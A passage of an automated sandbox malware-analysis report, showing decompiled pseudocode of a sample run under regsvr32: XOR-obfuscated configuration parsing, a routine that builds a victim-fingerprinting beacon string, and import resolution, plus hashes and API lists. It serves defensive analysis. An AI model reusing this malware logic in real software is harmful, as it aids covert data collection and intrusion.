Opcode ID: 38013d6bea2499c305de3b5546f2fe6fe5bcef9419b119ded78d6d08ededf1e9
Instruction ID: fb2b098ea60fbc32dfd78fdf1e904a0a5030f852b0fd3f1719fe97189ae44bc6
Opcode Fuzzy Hash: 38013d6bea2499c305de3b5546f2fe6fe5bcef9419b119ded78d6d08ededf1e9
Instruction Fuzzy Hash: E1E0453200420DBFDF129F90DC46EAA3F6AEB18754F148415FE1458171D77295B4FBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F46F0D, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F46F0D(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E00F4813D(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E00F46EF8(_a4);
				}
				return _t12;
			}

0x00f46f19
0x00f46f1e
0x00f46f22
0x00f46f29
0x00f46f34
0x00f46f38
0x00f46f38
0x00f46f41

APIs

Part of subcall function 00F4813D: memcpy.NTDLL(00000000,00000090,00000002,00000002,00F49F6B,00000008,00F49F6B,00F49F6B,?,00F44C77,00F49F6B), ref: 00F48173
Part of subcall function 00F4813D: memset.NTDLL ref: 00F481E9
Part of subcall function 00F4813D: memset.NTDLL ref: 00F481FD

memcpy.NTDLL(00000002,00F49F6B,00000000,00000002,00F49F6B,00F49F6B,00F49F6B,?,00F44C77,00F49F6B,?,00F49F6B,00000002,?,?,00F45A08), ref: 00F46F29

Part of subcall function 00F46EF8: RtlFreeHeap.NTDLL(00000000,00000000,00F44499,00000000,?,?,00000000), ref: 00F46F04

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: b59a7573dcf2bd9b67491a6e2f094aa200180c7d7dd4597d906506ccbd8023e2
Instruction ID: 37d98f7855677651d2522e63cf4c35329fa738ec243157215894ebbaee1e114c
Opcode Fuzzy Hash: b59a7573dcf2bd9b67491a6e2f094aa200180c7d7dd4597d906506ccbd8023e2
Instruction Fuzzy Hash: C7E08C7790112877CB122A94DC01DEFBF6C9F567E0F004021FE08DA202EA25CA52B3E2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F4A032, Relevance: 9.2, APIs: 6, Instructions: 223
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00F4A032(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0xf4d278; // 0x63699bc3
				if(E00F49AD6( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0xf4d2d4 = _v12;
				}
				_t25 =  *0xf4d278; // 0x63699bc3
				if(E00F49AD6( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0xf4d278; // 0x63699bc3
						_t31 = E00F45163(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xf4d240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0xf4d278; // 0x63699bc3
						_t32 = E00F45163(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xf4d244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0xf4d278; // 0x63699bc3
						_t33 = E00F45163(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xf4d248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0xf4d278; // 0x63699bc3
						_t34 = E00F45163(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0xf4d004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0xf4d278; // 0x63699bc3
						_t35 = E00F45163(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0xf4d02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0xf4d278; // 0x63699bc3
						_t36 = E00F45163(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E00F43D45(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E00F43E16();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0xf4d278; // 0x63699bc3
						_t37 = E00F45163(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E00F43D45(0, _t37) != 0) {
						_t102 =  *0xf4d32c; // 0x57395b0
						E00F440BB(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0xf4d278; // 0x63699bc3
						_t38 = E00F45163(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0xf4d27c; // 0x47ea5a8
						_t18 = _t39 + 0xf4e252; // 0x616d692f
						 *0xf4d2d0 = _t18;
						goto L52;
					} else {
						_t49 = E00F43D45(0, _t38);
						 *0xf4d2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0xf4d278; // 0x63699bc3
								_t41 = E00F45163(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0xf4d27c; // 0x47ea5a8
								_t19 = _t42 + 0xf4e791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E00F43D45(0, _t41);
							}
							 *0xf4d340 = _t43;
							HeapFree( *0xf4d238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}

0x00f4a032
0x00f4a035
0x00f4a055
0x00f4a063
0x00f4a063
0x00f4a068
0x00f4a082
0x00f4a280
0x00f4a282
0x00000000
0x00f4a088
0x00f4a088
0x00f4a08f
0x00f4a0a5
0x00f4a091
0x00f4a091
0x00f4a09e
0x00f4a09e
0x00f4a0af
0x00f4a0b1
0x00f4a0bb
0x00f4a0c0
0x00f4a0c0
0x00f4a0bb
0x00f4a0c7
0x00f4a0dd
0x00f4a0c9
0x00f4a0c9
0x00f4a0d6
0x00f4a0d6
0x00f4a0e1
0x00f4a0e3
0x00f4a0ed
0x00f4a0f2
0x00f4a0f2
0x00f4a0ed
0x00f4a0f9
0x00f4a10f
0x00f4a0fb
0x00f4a0fb
0x00f4a108
0x00f4a108
0x00f4a113
0x00f4a115
0x00f4a11f
0x00f4a124
0x00f4a124
0x00f4a11f
0x00f4a12b
0x00f4a141
0x00f4a12d
0x00f4a12d
0x00f4a13a
0x00f4a13a
0x00f4a145
0x00f4a147
0x00f4a151
0x00f4a156
0x00f4a156
0x00f4a151
0x00f4a15d
0x00f4a173
0x00f4a15f
0x00f4a15f
0x00f4a16c
0x00f4a16c
0x00f4a177
0x00f4a179
0x00f4a183
0x00f4a188
0x00f4a188
0x00f4a183
0x00f4a18f
0x00f4a1a5
0x00f4a191
0x00f4a191
0x00f4a19e
0x00f4a19e
0x00f4a1a9
0x00f4a1ab
0x00f4a1ae
0x00f4a1af
0x00f4a1b6
0x00f4a1b8
0x00f4a1b9
0x00f4a1b9
0x00f4a1b6
0x00f4a1c0
0x00f4a1d6
0x00f4a1c2
0x00f4a1c2
0x00f4a1cf
0x00f4a1cf
0x00f4a1da
0x00f4a1e8
0x00f4a1f2
0x00f4a1f2
0x00f4a1f9
0x00f4a20f
0x00f4a1fb
0x00f4a1fb
0x00f4a208
0x00f4a208
0x00f4a213
0x00f4a226
0x00f4a226
0x00f4a22b
0x00f4a231
0x00000000
0x00f4a215
0x00f4a218
0x00f4a21f
0x00f4a224
0x00f4a236
0x00f4a238
0x00f4a24e
0x00f4a23a
0x00f4a23a
0x00f4a247
0x00f4a247
0x00f4a252
0x00f4a25e
0x00f4a263
0x00f4a263
0x00f4a254
0x00f4a257
0x00f4a257
0x00f4a271
0x00f4a276
0x00f4a283
0x00f4a287
0x00f4a287
0x00000000
0x00f4a224
0x00f4a213

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,00F459CF,?,63699BC3,00F459CF,?,63699BC3,00000005,00F4D00C,00000008,?,00F459CF), ref: 00F4A0B7
StrToIntExA.SHLWAPI(00000000,00000000,?,00F459CF,?,63699BC3,00F459CF,?,63699BC3,00000005,00F4D00C,00000008,?,00F459CF), ref: 00F4A0E9
StrToIntExA.SHLWAPI(00000000,00000000,?,00F459CF,?,63699BC3,00F459CF,?,63699BC3,00000005,00F4D00C,00000008,?,00F459CF), ref: 00F4A11B
StrToIntExA.SHLWAPI(00000000,00000000,?,00F459CF,?,63699BC3,00F459CF,?,63699BC3,00000005,00F4D00C,00000008,?,00F459CF), ref: 00F4A14D
StrToIntExA.SHLWAPI(00000000,00000000,?,00F459CF,?,63699BC3,00F459CF,?,63699BC3,00000005,00F4D00C,00000008,?,00F459CF), ref: 00F4A17F
HeapFree.KERNEL32(00000000,00F459CF,00F459CF,?,63699BC3,00F459CF,?,63699BC3,00000005,00F4D00C,00000008,?,00F459CF), ref: 00F4A276

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 05e64c6b6f96cfdf7b1af99051c17afd1a162ec0562a94ec33d81e4214201b43
Instruction ID: dd916ba0451b9592474e7a348e3572db34eb05d13ae0f05e440e07a7758dfe1b
Opcode Fuzzy Hash: 05e64c6b6f96cfdf7b1af99051c17afd1a162ec0562a94ec33d81e4214201b43
Instruction Fuzzy Hash: 1061C5B9F40208ABDB20EBB8DCC4D5B7FE99B99710B240925EC01D7215E675DE41BB22

Uniqueness

Uniqueness Score: -1.00%

Function 00F496CE, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00F496CE(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0xf4d018; // 0x639b57ef
				asm("bswap eax");
				_t27 =  *0xf4d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0xf4d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0xf4d00c; // 0x81762942
				asm("bswap eax");
				_t30 =  *0xf4d27c; // 0x47ea5a8
				_t3 = _t30 + 0xf4e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d151, _t29, _t28, _t27, _t26,  *0xf4d02c,  *0xf4d004, _t25);
				_t33 = E00F46C9B();
				_t34 =  *0xf4d27c; // 0x47ea5a8
				_t4 = _t34 + 0xf4e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E00F4570D(_t91);
				if(_t96 != 0) {
					_t83 =  *0xf4d27c; // 0x47ea5a8
					_t6 = _t83 + 0xf4e8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0xf4d238, 0, _t96);
				}
				_t97 = E00F49525();
				if(_t97 != 0) {
					_t78 =  *0xf4d27c; // 0x47ea5a8
					_t8 = _t78 + 0xf4e8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0xf4d238, 0, _t97);
				}
				_t98 =  *0xf4d32c; // 0x57395b0
				_a32 = E00F44511(0xf4d00a, _t98 + 4);
				_t42 =  *0xf4d2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0xf4d27c; // 0x47ea5a8
					_t11 = _t74 + 0xf4e8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0xf4d2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0xf4d27c; // 0x47ea5a8
					_t13 = _t71 + 0xf4e8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0xf4d238, 0, 0x800);
					if(_t100 != 0) {
						E00F4A47F(GetTickCount());
						_t50 =  *0xf4d32c; // 0x57395b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0xf4d32c; // 0x57395b0
						__imp__(_t54 + 0x40);
						_t56 =  *0xf4d32c; // 0x57395b0
						_t103 = E00F48386(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0xf4c2ac);
							_push(_t103);
							_t62 = E00F441B9();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E00F445DE(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E00F448E8();
								}
								HeapFree( *0xf4d238, 0, _v44);
							}
							HeapFree( *0xf4d238, 0, _t103);
						}
						HeapFree( *0xf4d238, 0, _t100);
					}
					HeapFree( *0xf4d238, 0, _a24);
				}
				HeapFree( *0xf4d238, 0, _t105);
				return _a12;
			}

0x00f496ce
0x00f496ce
0x00f496ce
0x00f496d5
0x00f496db
0x00f496e3
0x00f496e5
0x00f496e5
0x00f496f2
0x00f496fd
0x00f49700
0x00f4970b
0x00f4970e
0x00f49713
0x00f49716
0x00f4971b
0x00f4971e
0x00f4972a
0x00f49737
0x00f49739
0x00f4973f
0x00f49744
0x00f4974f
0x00f49751
0x00f49754
0x00f4975b
0x00f4975f
0x00f49761
0x00f49766
0x00f49772
0x00f49774
0x00f49780
0x00f49782
0x00f49782
0x00f4978d
0x00f49791
0x00f49793
0x00f49798
0x00f497a4
0x00f497a6
0x00f497b2
0x00f497b4
0x00f497b4
0x00f497ba
0x00f497cd
0x00f497d1
0x00f497d8
0x00f497db
0x00f497e0
0x00f497eb
0x00f497ed
0x00f497f0
0x00f497f0
0x00f497f2
0x00f497f9
0x00f497fc
0x00f49801
0x00f4980b
0x00f4980d
0x00f49815
0x00f4982e
0x00f49832
0x00f4983e
0x00f49843
0x00f4984c
0x00f4985d
0x00f49861
0x00f4986a
0x00f49870
0x00f4987d
0x00f4988a
0x00f49890
0x00f4989c
0x00f498a2
0x00f498a3
0x00f498aa
0x00f498ae
0x00f498b4
0x00f498bb
0x00f498c2
0x00f498c8
0x00f498cf
0x00f498d3
0x00f498de
0x00f498e5
0x00f498e9
0x00f498f2
0x00f498f2
0x00f49903
0x00f49903
0x00f49912
0x00f49912
0x00f49921
0x00f49921
0x00f49933
0x00f49933
0x00f49942
0x00f49953

APIs

GetTickCount.KERNEL32 ref: 00F496E5
wsprintfA.USER32 ref: 00F49732
wsprintfA.USER32 ref: 00F4974F
wsprintfA.USER32 ref: 00F49772
HeapFree.KERNEL32(00000000,00000000), ref: 00F49782
wsprintfA.USER32 ref: 00F497A4
HeapFree.KERNEL32(00000000,00000000), ref: 00F497B4
wsprintfA.USER32 ref: 00F497EB
wsprintfA.USER32 ref: 00F4980B
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F49828
GetTickCount.KERNEL32 ref: 00F49838
RtlEnterCriticalSection.NTDLL(05739570), ref: 00F4984C
RtlLeaveCriticalSection.NTDLL(05739570), ref: 00F4986A

Part of subcall function 00F48386: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,00F4987D,?,057395B0), ref: 00F483B1
Part of subcall function 00F48386: lstrlen.KERNEL32(?,?,?,00F4987D,?,057395B0), ref: 00F483B9
Part of subcall function 00F48386: strcpy.NTDLL ref: 00F483D0
Part of subcall function 00F48386: lstrcat.KERNEL32(00000000,?), ref: 00F483DB
Part of subcall function 00F48386: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00F4987D,?,057395B0), ref: 00F483F8

StrTrimA.SHLWAPI(00000000,00F4C2AC,?,057395B0), ref: 00F4989C

Part of subcall function 00F441B9: lstrlen.KERNEL32(05739978,00000000,00000000,745EC740,00F498A8,00000000), ref: 00F441C9
Part of subcall function 00F441B9: lstrlen.KERNEL32(?), ref: 00F441D1
Part of subcall function 00F441B9: lstrcpy.KERNEL32(00000000,05739978), ref: 00F441E5
Part of subcall function 00F441B9: lstrcat.KERNEL32(00000000,?), ref: 00F441F0

lstrcpy.KERNEL32(00000000,?), ref: 00F498BB
lstrcpy.KERNEL32(00000000,00000000), ref: 00F498C2
lstrcat.KERNEL32(00000000,?), ref: 00F498CF
lstrcat.KERNEL32(00000000,00000000), ref: 00F498D3

Part of subcall function 00F445DE: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,73BB81D0), ref: 00F44690

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00F49903
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00F49912
HeapFree.KERNEL32(00000000,00000000,?,057395B0), ref: 00F49921
HeapFree.KERNEL32(00000000,00000000), ref: 00F49933
HeapFree.KERNEL32(00000000,?), ref: 00F49942

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: a23ec0c3613fa6e02dca049cb1217babcd3aeac303e4e3ed01ea10c5769bda6a
Instruction ID: abc41b2bc698785226f68c4268bcb5f8fb1170a192804c0321904bb90b3579a8
Opcode Fuzzy Hash: a23ec0c3613fa6e02dca049cb1217babcd3aeac303e4e3ed01ea10c5769bda6a
Instruction Fuzzy Hash: D361BB79601208EFD7219B68EC88F6A3BE8EB5A710F050014FD08D7271DB79E905BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F4AD85, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00F4AD85(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0xf40000;
				_t115 = _t139[3] + 0xf40000;
				_t131 = _t139[4] + 0xf40000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0xf40000;
				_v16 = _t139[5] + 0xf40000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0xf40002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0xf4d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0xf4d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0xf4d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0xf4d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0xf4d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0xf4d198; // 0x0
										 *_t102 = _t125;
										 *0xf4d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0xf4d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x00f4ad94
0x00f4adaa
0x00f4adb0
0x00f4adb2
0x00f4adb7
0x00f4adbd
0x00f4adc2
0x00f4adc5
0x00f4add3
0x00f4adda
0x00f4addd
0x00f4ade0
0x00f4ade1
0x00f4ade4
0x00f4ade7
0x00f4adea
0x00f4adef
0x00f4adfe
0x00000000
0x00f4ae04
0x00f4ae0e
0x00f4ae18
0x00f4ae1d
0x00f4ae1f
0x00f4ae29
0x00f4ae2c
0x00f4ae2f
0x00f4ae35
0x00f4ae37
0x00f4ae37
0x00f4ae3a
0x00f4ae3d
0x00f4ae42
0x00f4ae46
0x00f4ae59
0x00f4ae5b
0x00f4af03
0x00f4af03
0x00f4af0a
0x00f4af0d
0x00f4af17
0x00f4af17
0x00f4af1b
0x00f4af99
0x00f4af9c
0x00f4af9e
0x00f4af9e
0x00f4afa5
0x00f4afa7
0x00f4afb1
0x00f4afb4
0x00f4afb7
0x00f4afb7
0x00000000
0x00f4af1d
0x00f4af20
0x00f4af4e
0x00f4af58
0x00f4af5c
0x00f4af64
0x00f4af67
0x00f4af6e
0x00f4af78
0x00f4af78
0x00f4af7c
0x00f4af81
0x00f4af90
0x00f4af96
0x00f4af96
0x00f4af7c
0x00000000
0x00f4af27
0x00f4af2a
0x00f4af32
0x00f4af47
0x00f4af4c
0x00000000
0x00000000
0x00f4af4c
0x00000000
0x00f4af32
0x00f4af20
0x00f4af1b
0x00f4ae61
0x00f4ae68
0x00f4ae78
0x00f4ae81
0x00f4ae85
0x00f4aec8
0x00f4aed4
0x00f4aefd
0x00f4aed6
0x00f4aeda
0x00f4aee0
0x00f4aee8
0x00f4aeea
0x00f4aeed
0x00f4aef3
0x00f4aef5
0x00f4aef5
0x00f4aee8
0x00f4aeda
0x00000000
0x00f4aed4
0x00f4ae8d
0x00f4ae90
0x00f4ae97
0x00f4aea7
0x00f4aeaa
0x00f4aeba
0x00000000
0x00f4aec0
0x00f4aea1
0x00f4aea5
0x00000000
0x00000000
0x00000000
0x00f4aea5
0x00f4ae72
0x00f4ae76
0x00000000
0x00000000
0x00000000
0x00f4ae76
0x00f4ae4f
0x00f4ae53
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4ADFE
LoadLibraryA.KERNEL32(?), ref: 00F4AE7B
GetLastError.KERNEL32 ref: 00F4AE87
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00F4AEBA

Strings

$, xrefs: 00F4ADD3

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: ae1fcc543ca4d7776bd5e8d14506d7fb8bb5497e79ef2f1460097012907d5834
Instruction ID: ccc6e77835af151bef5385f9c7f457de9361b5b6125f3bfc050f43919ff64573
Opcode Fuzzy Hash: ae1fcc543ca4d7776bd5e8d14506d7fb8bb5497e79ef2f1460097012907d5834
Instruction Fuzzy Hash: D7813AB5A40209AFDB21CFA9D880BAEBBF5EF58324F108029ED15D7350EB70E945DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F4551A, Relevance: 16.6, APIs: 11, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

